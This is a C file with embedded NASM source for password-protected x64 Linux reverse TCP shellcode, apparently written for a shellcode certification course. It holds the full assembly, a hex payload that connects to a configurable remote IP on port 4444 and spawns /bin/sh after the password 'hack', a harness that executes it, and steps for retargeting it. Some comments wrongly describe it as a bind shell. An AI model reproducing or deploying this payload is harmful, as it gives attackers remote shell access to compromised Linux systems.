/*---------------------------------------------------------------------------------------------------------------------
/*
*Title:            tcp reverse shell with password prompt in 151 bytes 
*Author:           Sathish kumar
*Contact:          https://www.linkedin.com/in/sathish94
* Copyright:        (c) 2016 iQube. (http://iQube.io)
* Release Date:     January 6, 2016
*Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On:        Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444
* 
*/
 
/* 
* NOTE: This C code binds on port 4444 
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
*            port.py
*                  import socket
*               port = 4444
*                  hex(socket.htons(port))
*            python port.py 
*            Result : 0x5c11 
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
*           nasm -felf64 filename.nasm -o filename.o
*           ld filename.o -o filename
* To inspect for nulls
*           objdump -M intel -D filename.o


global _start

_start:
    jmp sock
  prompt: db 'Passcode' ; initilization of prompt data
     ; sock = socket(AF_INET, SOCK_STREAM, 0)
  ; AF_INET = 2
  ; SOCK_STREAM = 1
  ; syscall number 41 

sock:
  xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
  xor rsi, rsi 
  mul rsi       
  push byte 0x2   ;pusing argument to the stack
  pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
  inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
  push byte 0x29  ; pushing the syscall number into the rax by using stack
  pop rax
  syscall
  
  ; copying the socket descripter from rax to rdi register so that we can use it further 

  xchg rax, rdi
  
  ; server.sin_family = AF_INET 
  ; server.sin_port = htons(PORT)
  ; server.sin_addr.s_addr = INADDR_ANY
  ; bzero(&server.sin_zero, 8)
  ; setting up the data sctructure
  
  xor rax, rax
  push rax                         ; bzero(&server.sin_zero, 8)
  mov ebx , 0xfeffff80             ; ip address 127.0.0.1 "noted" to remove null
  not ebx
  mov dword [rsp-4], ebx
  sub rsp , 4                      ; adjust the stack
  push word 0x5c11                 ; port 4444 in network byte order
  push word 0x02                   ; AF_INET
  push rsp
  pop rsi

    ; connecting to the remote ip
    push 0x2a
    pop rax
    push 0x10
    pop rdx
    syscall
    
  
  ; initilization of dup2
  push 0x3                           
  pop rsi                ; setting argument to 3 



duplicate:
    dec esi                            
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    syscall
    jne duplicate
    
xor rax, rax                      
  inc al                             ; rax register to value 1 syscall for write
  push rax  
  pop rdi                 ; rdi register to value 1
  lea rsi, [rel prompt]
  xor rdx, rdx                       ; xor the rdx register to clear the previous values
  push 0xe
  pop rdx
  syscall
  
                     ; checking the password using read
password_check:
  
  push rsp
  pop rsi
  xor rax, rax   ; system read syscall value is 0 so rax is set to 0
  syscall
  push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
  pop rax
  lea rdi, [rel rsi]
  scasd           ; comparing the user input and stored password in the stack
  jne Exit    




execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register 
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order 
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax
     syscall

Exit:

   ;Exit shellcode if password is wrong
   push 0x3c
   pop rax        ;syscall number for exit is 60
   xor rdi, rdi 
   syscall
*/ 


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
//ip address which can be obtained by
/*      example 10.1.75.202
 *       hex value equivalent =  0a.01.4b.ca
 */
//replace this with the ip address of the system to which the shell should connect
"\x0a\x01\x4b\xca"
"\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
//Password this can be obtained by
/*
 * python 
 *       password = 'hack' 
 *       (password[::-1]).encode('hex')
 *       Reuslt : 6b636168 
 *   This is stored in reverse beacuse of stack
 * 
 * 
 */ 
"\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";

main()
{

  printf("Shellcode Length:  %d\n", (int)strlen(code));

  int (*ret)() = (int(*)())code;

  ret();

}